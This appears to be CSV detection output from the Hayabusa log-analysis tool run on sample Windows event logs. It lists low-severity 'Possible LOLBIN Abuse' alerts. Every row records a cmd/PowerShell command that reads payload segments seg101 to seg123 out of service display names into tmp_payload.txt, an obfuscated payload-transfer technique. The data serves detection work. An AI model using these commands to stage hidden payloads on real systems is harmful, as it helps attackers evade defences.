2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:55.301 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:55.317 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:56.773 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:56.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:02.569 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:02.585 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:17.309 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:20.265 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:20.281 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:24.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:24.615 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:26.056 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:26.072 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
